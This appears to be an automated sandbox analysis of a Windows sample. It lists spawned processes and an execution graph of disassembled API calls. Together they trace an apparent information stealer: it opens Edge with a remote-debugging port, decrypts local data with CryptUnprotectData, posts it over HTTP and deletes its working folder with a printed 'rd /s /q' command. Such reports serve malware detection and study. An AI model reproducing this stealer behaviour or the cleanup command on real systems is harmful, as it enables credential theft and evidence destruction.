                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3
                                                                                                                                                                                                                                                Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:11:07:30
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:11:07:30
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit
                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:timeout /t 10
                                                                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064
                                                                                                                                                                                                                                                Imagebase:0x660000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                Start time:11:08:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:14.1%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                                                                                                  Signature Coverage:35.3%
                                                                                                                                                                                                                                                  Total number of Nodes:1610
                                                                                                                                                                                                                                                  Total number of Limit Nodes:37
                                                                                                                                                                                                                                                  execution_graph 14055 a29ba6 14056 a29bb5 14055->14056 14059 a2a346 14056->14059 14060 a2a361 14059->14060 14061 a2a36a CreateToolhelp32Snapshot 14060->14061 14062 a2a386 Module32First 14060->14062 14061->14060 14061->14062 14063 a2a395 14062->14063 14064 a29bbe 14062->14064 14066 a2a005 14063->14066 14067 a2a030 14066->14067 14068 a2a041 VirtualAlloc 14067->14068 14069 a2a079 14067->14069 14068->14069 14069->14069 14103 408807 14131 413740 14103->14131 14107 40883e 14143 41370e 14107->14143 14109 40884d 14110 40885a InternetOpenA StrCmpCA 14109->14110 14111 408891 InternetConnectA 14110->14111 14112 4089f4 14110->14112 14111->14112 14113 4088ca 14111->14113 14114 41370e lstrcpyA 14112->14114 14115 408a2c InternetCloseHandle 14113->14115 14116 40891f 14113->14116 14122 408a24 14114->14122 14119 408a34 14115->14119 14117 408925 InternetSetOptionA 14116->14117 14118 40893a HttpSendRequestA HttpQueryInfoA 14116->14118 14117->14118 14118->14119 14120 40896e 14118->14120 14121 41370e lstrcpyA 14119->14121 14123 408a66 14120->14123 14130 40897f 14120->14130 14121->14122 14125 41370e lstrcpyA 14123->14125 14124 408a9b InternetCloseHandle 14126 413740 lstrcpyA 14124->14126 14125->14122 14126->14122 14127 408998 InternetReadFile 14127->14124 14127->14130 14130->14124 14130->14127 14147 413860 lstrlenA 14130->14147 14151 4137c0 14130->14151 14132 413755 14131->14132 14133 408832 14132->14133 14134 413761 lstrcpyA 14132->14134 14135 406be0 14133->14135 14134->14133 14136 406bec 14135->14136 14136->14136 14137 406bf7 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 14136->14137 14155 41398e 14137->14155 14139 406c49 lstrlenA 14156 41398e 14139->14156 14141 406c55 InternetCrackUrlA 14142 406c63 14141->14142 14142->14107 14144 41371c 14143->14144 14145 413738 14144->14145 14146 413730 lstrcpyA 14144->14146 14145->14109 14146->14145 14148 41388e 14147->14148 14149 4138b0 14148->14149 14150 4138a0 lstrcpyA lstrcatA 14148->14150 14149->14130 14150->14149 14152 4137d4 14151->14152 14153 4137fe 14152->14153 14154 4137f6 lstrcpyA 14152->14154 14153->14130 14154->14153 14155->14139 14156->14141 14892 40de0c 14893 41370e lstrcpyA 14892->14893 14894 40de2f 14893->14894 14895 413806 2 API calls 14894->14895 14896 40de3b 14895->14896 14897 413860 3 API calls 14896->14897 14898 40de72 14897->14898 14899 4137c0 lstrcpyA 14898->14899 14900 40de7e 14899->14900 14901 40de9d FindFirstFileA 14900->14901 14904 40e672 14901->14904 14917 40dead 14901->14917 14902 40e660 FindNextFileA 14902->14904 14902->14917 14903 41370e lstrcpyA 14903->14917 14905 40dfba StrCmpCA 14905->14917 14907 40dff5 StrCmpCA 14907->14917 14908 40e03a StrCmpCA 14908->14917 14909 413860 lstrlenA lstrcpyA lstrcatA 14909->14917 14910 413806 lstrcpyA lstrcatA 14910->14917 14911 4137c0 lstrcpyA 14911->14917 14912 413740 lstrcpyA 14912->14917 14913 414ab3 GetFileAttributesA 14913->14917 14914 413740 lstrcpyA 14915 40e386 14914->14915 14915->14914 14916 40d820 127 API calls 14915->14916 14915->14917 14916->14915 14917->14902 14917->14903 14917->14905 14917->14907 14917->14908 14917->14909 14917->14910 14917->14911 14917->14912 14917->14913 14917->14915 14918 413778 lstrlenA 14917->14918 14919 413790 14918->14919 14920 4137b8 14919->14920 14921 4137b0 lstrcpyA 14919->14921 14920->14917 14921->14920 15434 401011 VirtualAlloc 15435 401032 15434->15435 15436 40106a 15435->15436 15437 40103f memset VirtualFree 15435->15437 15437->15436 15438 40e6d2 15440 40e700 15438->15440 15439 413740 lstrcpyA 15439->15440 15440->15439 15441 40e810 15440->15441 15824 9b0001 15825 9b0005 15824->15825 15830 9b092b GetPEB 15825->15830 15827 9b0030 15832 9b003c 15827->15832 15831 9b0972 15830->15831 15831->15827 15833 9b0049 15832->15833 15834 9b0e0f 2 API calls 15833->15834 15835 9b0223 15834->15835 15836 9b0d90 GetPEB 15835->15836 15837 9b0238 VirtualAlloc 15836->15837 15838 9b0265 15837->15838 15839 9b02ce VirtualProtect 15838->15839 15841 9b030b 15839->15841 15840 9b0439 VirtualFree 15845 9b04be 15840->15845 15846 9b05f4 LoadLibraryA 15840->15846 15841->15840 15842 9b04e3 LoadLibraryA 15842->15845 15844 9b08c7 15845->15842 15845->15846 15846->15844 15576 407d9e 15577 413740 lstrcpyA 15576->15577 15578 407dc6 15577->15578 15579 406be0 5 API calls 15578->15579 15580 407dd3 15579->15580 15581 41370e lstrcpyA 15580->15581 15582 407de3 15581->15582 15583 41370e lstrcpyA 15582->15583 15584 407dec 15583->15584 15585 41370e lstrcpyA 15584->15585 15586 407df5 15585->15586 15587 41370e lstrcpyA 15586->15587 15588 407dfe 15587->15588 15589 41370e lstrcpyA 15588->15589 15590 407e07 15589->15590 15591 407e17 InternetOpenA StrCmpCA 15590->15591 15592 407e44 15591->15592 15593 4085a5 InternetCloseHandle 15591->15593 15594 4148f3 4 API calls 15592->15594 15595 4085b6 15593->15595 15596 407e55 15594->15596 15598 40af38 2 API calls 15595->15598 15597 413806 2 API calls 15596->15597 15599 407e67 15597->15599 15600 4085c4 15598->15600 15601 4137c0 lstrcpyA 15599->15601 15602 413778 2 API calls 15600->15602 15604 408613 15600->15604 15606 407e6f 15601->15606 15603 4085d7 15602->15603 15605 413860 3 API calls 15603->15605 15608 413740 lstrcpyA 15604->15608 15607 4085ea 15605->15607 15612 413860 3 API calls 15606->15612 15609 4137c0 lstrcpyA 15607->15609 15610 408635 15608->15610 15611 4085f2 15609->15611 15624 4084fb 15610->15624 15614 4085f9 GetProcessHeap HeapFree 15611->15614 15613 407ead 15612->15613 15615 4137c0 lstrcpyA 15613->15615 15614->15604 15616 407eb5 15615->15616 15617 413860 3 API calls 15616->15617 15618 407ef3 15617->15618 15619 4137c0 lstrcpyA 15618->15619 15620 407efb 15619->15620 15621 413806 2 API calls 15620->15621 15622 407f0b 15621->15622 15623 4137c0 lstrcpyA 15622->15623 15625 407f13 15623->15625 15626 413860 3 API calls 15625->15626 15627 407f47 15626->15627 15628 4137c0 lstrcpyA 15627->15628 15629 407f4f 15628->15629 15630 413860 3 API calls 15629->15630 15631 407f63 15630->15631 15632 4137c0 lstrcpyA 15631->15632 15633 407f6b 15632->15633 15634 413860 3 API calls 15633->15634 15635 407f88 15634->15635 15636 413806 2 API calls 15635->15636 15637 407f94 15636->15637 15638 4137c0 lstrcpyA 15637->15638 15639 407f9c 15638->15639 15640 407faa InternetConnectA 15639->15640 15640->15593 15641 407ff0 HttpOpenRequestA 15640->15641 15642 40859e InternetCloseHandle 15641->15642 15643 40802e 15641->15643 15642->15593 15644 408034 InternetSetOptionA 15643->15644 15645 40804b 15643->15645 15644->15645 15646 413860 3 API calls 15645->15646 15647 40808e 15646->15647 15648 4137c0 lstrcpyA 15647->15648 15649 408096 15648->15649 15650 413806 2 API calls 15649->15650 15651 4080a9 15650->15651 15652 4137c0 lstrcpyA 15651->15652 15653 4080b1 15652->15653 15654 413860 3 API calls 15653->15654 15655 4080e5 15654->15655 15656 4137c0 lstrcpyA 15655->15656 15657 4080ed 15656->15657 15658 413860 3 API calls 15657->15658 15659 408102 15658->15659 15660 4137c0 lstrcpyA 15659->15660 15661 40810a 15660->15661 15662 413860 3 API calls 15661->15662 15663 40811f 15662->15663 15664 4137c0 lstrcpyA 15663->15664 15665 408127 15664->15665 15666 413860 3 API calls 15665->15666 15667 40815e 15666->15667 15668 4137c0 lstrcpyA 15667->15668 15669 408166 15668->15669 15670 413806 2 API calls 15669->15670 15671 40817c 15670->15671 15672 4137c0 lstrcpyA 15671->15672 15673 408184 15672->15673 15674 413860 3 API calls 15673->15674 15675 408199 15674->15675 15676 4137c0 lstrcpyA 15675->15676 15677 4081a1 15676->15677 15678 413860 3 API calls 15677->15678 15679 4081b5 15678->15679 15680 4137c0 lstrcpyA 15679->15680 15681 4081bd 15680->15681 15682 413806 2 API calls 15681->15682 15683 4081d0 15682->15683 15684 4137c0 lstrcpyA 15683->15684 15685 4081d8 15684->15685 15686 413860 3 API calls 15685->15686 15687 4081e8 15686->15687 15688 4137c0 lstrcpyA 15687->15688 15689 4081f0 15688->15689 15690 413860 3 API calls 15689->15690 15691 408205 15690->15691 15692 4137c0 lstrcpyA 15691->15692 15693 40820d 15692->15693 15694 413860 3 API calls 15693->15694 15695 408248 15694->15695 15696 4137c0 lstrcpyA 15695->15696 15697 408250 15696->15697 15698 413860 3 API calls 15697->15698 15699 408264 15698->15699 15700 4137c0 lstrcpyA 15699->15700 15701 40826c 15700->15701 15702 413860 3 API calls 15701->15702 15703 408281 15702->15703 15704 4137c0 lstrcpyA 15703->15704 15705 408289 15704->15705 15706 413860 3 API calls 15705->15706 15707 408299 15706->15707 15708 4137c0 lstrcpyA 15707->15708 15709 4082a1 15708->15709 15710 413860 3 API calls 15709->15710 15711 4082b5 15710->15711 15712 4137c0 lstrcpyA 15711->15712 15713 4082bd 15712->15713 15714 413806 2 API calls 15713->15714 15715 4082d0 15714->15715 15716 4137c0 lstrcpyA 15715->15716 15717 4082d8 15716->15717 15718 413860 3 API calls 15717->15718 15719 4082e8 15718->15719 15720 4137c0 lstrcpyA 15719->15720 15721 4082f0 15720->15721 15722 413860 3 API calls 15721->15722 15723 408305 15722->15723 15724 4137c0 lstrcpyA 15723->15724 15725 40830d 15724->15725 15726 413860 3 API calls 15725->15726 15727 408342 15726->15727 15728 4137c0 lstrcpyA 15727->15728 15729 40834a 15728->15729 15730 413860 3 API calls 15729->15730 15731 40835e 15730->15731 15732 4137c0 lstrcpyA 15731->15732 15733 408366 15732->15733 15734 413806 2 API calls 15733->15734 15735 408379 15734->15735 15736 4137c0 lstrcpyA 15735->15736 15737 408381 15736->15737 15738 408395 lstrlenA 15737->15738 15764 41398e 15738->15764 15740 4083a8 lstrlenA GetProcessHeap HeapAlloc 15741 4084aa InternetCloseHandle InternetCloseHandle InternetCloseHandle 15740->15741 15744 4083cc 15740->15744 15742 4084d7 15741->15742 15743 41370e lstrcpyA 15742->15743 15743->15624 15745 4083e6 lstrlenA memcpy 15744->15745 15765 41398e 15745->15765 15747 408402 lstrlenA 15748 408414 15747->15748 15749 408424 lstrlenA memcpy 15748->15749 15751 408434 15749->15751 15750 40844c lstrlenA 15750->15751 15751->15750 15752 408500 15751->15752 15753 40846e Sleep 15751->15753 15756 40850c GetProcessHeap HeapFree 15752->15756 15754 408483 15753->15754 15755 408488 15753->15755 15754->15751 15754->15755 15758 408494 GetProcessHeap HeapFree 15755->15758 15757 40851e InternetReadFile 15756->15757 15759 40858c InternetCloseHandle 15757->15759 15762 40853e 15757->15762 15758->15741 15758->15757 15759->15642 15760 413860 3 API calls 15760->15762 15761 4137c0 lstrcpyA 15761->15762 15762->15759 15762->15760 15762->15761 15763 40856e InternetReadFile 15762->15763 15763->15759 15763->15762 15764->15740 15765->15747 14040 4125e0 14041 4125e8 14040->14041 14042 41260e 14040->14042 14043 412613 ??2@YAPAXI 14041->14043 14044 4125ef 14041->14044 14045 4125f4 ??2@YAPAXI 14044->14045 14046 41261f 14044->14046 14048 420dde 14046->14048 14049 420dec Concurrency::cancel_current_task 14048->14049 14052 420f5e 14049->14052 14051 420dfa 14053 420fa5 RaiseException 14052->14053 14054 420f78 14052->14054 14053->14051 14054->14053 14070 401325 GetPEB 14071 40133c 14070->14071 14072 401342 lstrcmpiW 14071->14072 14073 401355 GetPEB 14071->14073 14072->14071 14075 401350 14072->14075 14074 401363 14073->14074 14076 401369 lstrcmpiW 14074->14076 14077 40137c GetPEB 14074->14077 14076->14074 14076->14075 14078 40138a 14077->14078 14079 401390 lstrcmpiW 14078->14079 14080 4013a3 GetPEB 14078->14080 14079->14075 14079->14078 14081 4013b1 14080->14081 14082 4013b7 lstrcmpiW 14081->14082 14083 4013ca GetPEB 14081->14083 14082->14075 14082->14081 14084 4013d8 14083->14084 14085 4013ee GetPEB 14084->14085 14086 4013de lstrcmpiW 14084->14086 14087 4013fc 14085->14087 14086->14075 14086->14084 14088 401412 14087->14088 14089 401402 lstrcmpiW 14087->14089 14099 4012ed GetPEB 14088->14099 14089->14075 14089->14087 14092 4012ed 2 API calls 14093 40142a 14092->14093 14093->14075 14094 4012ed 2 API calls 14093->14094 14095 401438 14094->14095 14095->14075 14096 4012ed 2 API calls 14095->14096 14097 401446 14096->14097 14097->14075 14098 4012ed 2 API calls 14097->14098 14098->14075 14100 401309 14099->14100 14101 401319 14100->14101 14102 40130f lstrcmpiW 14100->14102 14101->14075 14101->14092 14102->14100 14102->14101 14157 9b003c 14158 9b0049 14157->14158 14172 9b0e0f SetErrorMode SetErrorMode 14158->14172 14163 9b0265 14164 9b02ce VirtualProtect 14163->14164 14166 9b030b 14164->14166 14165 9b0439 VirtualFree 14170 9b04be 14165->14170 14171 9b05f4 LoadLibraryA 14165->14171 14166->14165 14167 9b04e3 LoadLibraryA 14167->14170 14169 9b08c7 14170->14167 14170->14171 14171->14169 14173 9b0223 14172->14173 14174 9b0d90 14173->14174 14175 9b0dad 14174->14175 14176 9b0dbb GetPEB 14175->14176 14177 9b0238 VirtualAlloc 14175->14177 14176->14177 14177->14163 14178 40e92a 14179 40e931 14178->14179 14180 40e955 14178->14180 14182 413740 lstrcpyA 14179->14182 14181 413740 lstrcpyA 14180->14181 14212 40ea05 14180->14212 14183 40e998 14181->14183 14184 40e936 14182->14184 14186 413740 lstrcpyA 14183->14186 14229 414ab3 14184->14229 14188 40e9ab 14186->14188 14187 40e93b 14187->14180 14190 40ea24 14187->14190 14187->14212 14189 413740 lstrcpyA 14188->14189 14191 40e9ba 14189->14191 14192 413740 lstrcpyA 14190->14192 14193 413740 lstrcpyA 14191->14193 14194 40ea3b 14192->14194 14195 40e9d3 14193->14195 14196 413740 lstrcpyA 14194->14196 14197 413740 lstrcpyA 14195->14197 14198 40ea4a 14196->14198 14199 40e9fa 14197->14199 14201 413740 lstrcpyA 14198->14201 14200 413740 lstrcpyA 14199->14200 14200->14212 14202 40ea59 14201->14202 14203 413740 lstrcpyA 14202->14203 14204 40ea72 14203->14204 14205 413740 lstrcpyA 14204->14205 14206 40ea9f 14205->14206 14233 40b14b 14206->14233 14208 40eabd 14209 413740 lstrcpyA 14208->14209 14208->14212 14210 40eaeb 14209->14210 14211 413740 lstrcpyA 14210->14211 14213 40eafd 14211->14213 14214 413740 lstrcpyA 14213->14214 14215 40eb15 14214->14215 14216 413740 lstrcpyA 14215->14216 14217 40eb21 14216->14217 14218 41370e lstrcpyA 14217->14218 14219 40eb2e 14218->14219 14220 413740 lstrcpyA 14219->14220 14221 40eb39 14220->14221 14222 413740 lstrcpyA 14221->14222 14223 40eb44 14222->14223 14224 413740 lstrcpyA 14223->14224 14225 40eb4f 14224->14225 14226 413740 lstrcpyA 14225->14226 14227 40eb67 14226->14227 14228 40b942 284 API calls 14227->14228 14228->14212 14249 41398e 14229->14249 14231 414ac7 GetFileAttributesA 14232 414ad8 14231->14232 14232->14187 14234 41370e lstrcpyA 14233->14234 14235 40b16c 14234->14235 14250 40ae6d 14235->14250 14237 40b17d 14246 40b232 14237->14246 14262 414b34 14237->14262 14239 40b194 14240 40b1e1 14239->14240 14239->14246 14270 40af38 lstrlenA 14240->14270 14244 40b2a3 lstrlenA 14244->14246 14245 413860 3 API calls 14245->14246 14246->14244 14246->14245 14266 40b006 CryptUnprotectData 14246->14266 14274 40ab34 14246->14274 14283 41797d 14246->14283 14249->14231 14299 41398e 14250->14299 14252 40ae89 CreateFileA 14253 40af25 14252->14253 14254 40aeaf GetFileSizeEx 14252->14254 14253->14237 14255 40aec1 14254->14255 14256 40af1e CloseHandle 14254->14256 14255->14256 14257 40aec8 LocalAlloc 14255->14257 14256->14253 14257->14256 14258 40aee7 ReadFile 14257->14258 14259 40af13 LocalFree 14258->14259 14260 40af03 14258->14260 14259->14256 14260->14259 14261 40af0e 14260->14261 14261->14256 14263 414b41 14262->14263 14265 414b59 14262->14265 14264 414b49 LocalAlloc 14263->14264 14263->14265 14264->14265 14265->14239 14265->14265 14267 40b047 LocalAlloc 14266->14267 14268 40b06f LocalFree 14266->14268 14267->14268 14269 40b063 14267->14269 14268->14246 14269->14268 14271 40af5d LocalAlloc 14270->14271 14273 40af81 14271->14273 14273->14246 14275 413740 lstrcpyA 14274->14275 14276 40ab42 14275->14276 14277 413740 lstrcpyA 14276->14277 14278 40ab4e 14277->14278 14279 413740 lstrcpyA 14278->14279 14280 40ab5a 14279->14280 14281 413740 lstrcpyA 14280->14281 14282 40ab70 14281->14282 14282->14246 14284 4179a0 14283->14284 14285 4137c0 lstrcpyA 14284->14285 14286 4179d9 14285->14286 14287 4137c0 lstrcpyA 14286->14287 14288 4179fc 14287->14288 14289 4137c0 lstrcpyA 14288->14289 14290 417a0a 14289->14290 14291 4137c0 lstrcpyA 14290->14291 14292 417a18 14291->14292 14293 417a22 Sleep 14292->14293 14296 417a2f 14292->14296 14293->14292 14294 417a69 CreateThread WaitForSingleObject 14295 41370e lstrcpyA 14294->14295 14640 41a90d 14294->14640 14298 417a98 14295->14298 14296->14294 14300 420be0 14296->14300 14298->14246 14299->14252 14301 420c08 14300->14301 14302 420be8 14300->14302 14301->14294 14302->14301 14304 420040 14302->14304 14305 420058 14304->14305 14477 420066 14304->14477 14306 420075 lstrcpyA 14305->14306 14305->14477 14307 4200b8 14306->14307 14306->14477 14308 4200e6 14307->14308 14309 420117 strlen 14307->14309 14513 41f51e lstrlenA 14308->14513 14311 4200fb 14309->14311 14312 420155 14311->14312 14313 42016a 14311->14313 14314 42015a 14312->14314 14315 42017c 14312->14315 14538 41fb48 14313->14538 14317 420198 14314->14317 14318 42015f 14314->14318 14547 41fc76 14315->14547 14317->14477 14552 41fd52 GetLocalTime SystemTimeToFileTime 14317->14552 14531 41faaa 14318->14531 14319 420168 14323 4201a9 lstrcpyA lstrcpyA lstrlenA 14319->14323 14319->14477 14324 420223 lstrcpyA 14323->14324 14325 4201f3 lstrcatA 14323->14325 14555 41f988 14324->14555 14325->14324 14329 41f988 5 API calls 14330 42036f 14329->14330 14331 41f988 5 API calls 14330->14331 14332 42037c 14331->14332 14333 41f988 5 API calls 14332->14333 14334 420389 14333->14334 14335 41f988 5 API calls 14334->14335 14336 42039b 14335->14336 14337 41f988 5 API calls 14336->14337 14338 4203ad 14337->14338 14339 41f988 5 API calls 14338->14339 14340 4203bf 14339->14340 14341 41f988 5 API calls 14340->14341 14342 4203d1 14341->14342 14343 41f988 5 API calls 14342->14343 14344 4203e3 14343->14344 14345 41f988 5 API calls 14344->14345 14346 4203f5 14345->14346 14347 41f988 5 API calls 14346->14347 